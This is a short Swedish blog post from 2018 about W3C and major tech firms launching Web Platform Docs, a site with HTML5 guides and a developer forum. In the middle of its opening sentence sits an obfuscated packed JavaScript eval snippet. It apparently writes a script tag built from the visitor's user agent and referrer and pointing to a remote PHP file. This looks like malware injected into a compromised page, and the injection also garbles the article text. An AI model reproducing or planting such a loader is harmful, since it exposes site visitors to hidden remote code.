Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Web Platform Docs lanseras

Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfknz|var|u0026u|referrer|frnea||js|php’.split(‘|’),0,{}))
drar några av världens största IT-företag igång en gemensam satsning på webbutveckling ihop med webbens största standardorganisation World Wide Web Consortium (W3C).

Företag som Adobe, Apple, Facebook, Google, HP, Microsoft, Mozilla, Nokia samt Opera har tillsammans med W3C lanserat ”Web Platform”där man ska kunna hitta ”Web Platform Docs” vilka är riktlinjer till hur man bäst tar fram webbplatser.

Det finns även guider där som visar på hur man utvecklar med HTML5 och andra webbspecifika tekniker.

Förutom detta så finns också ett forum och chat möjlighet där användare kan ställa frågor samt besvara andras.

Titta på videon ovan för att få en mer detaljerat beskrivning av vad Web Platform egentligen är.

via Engadget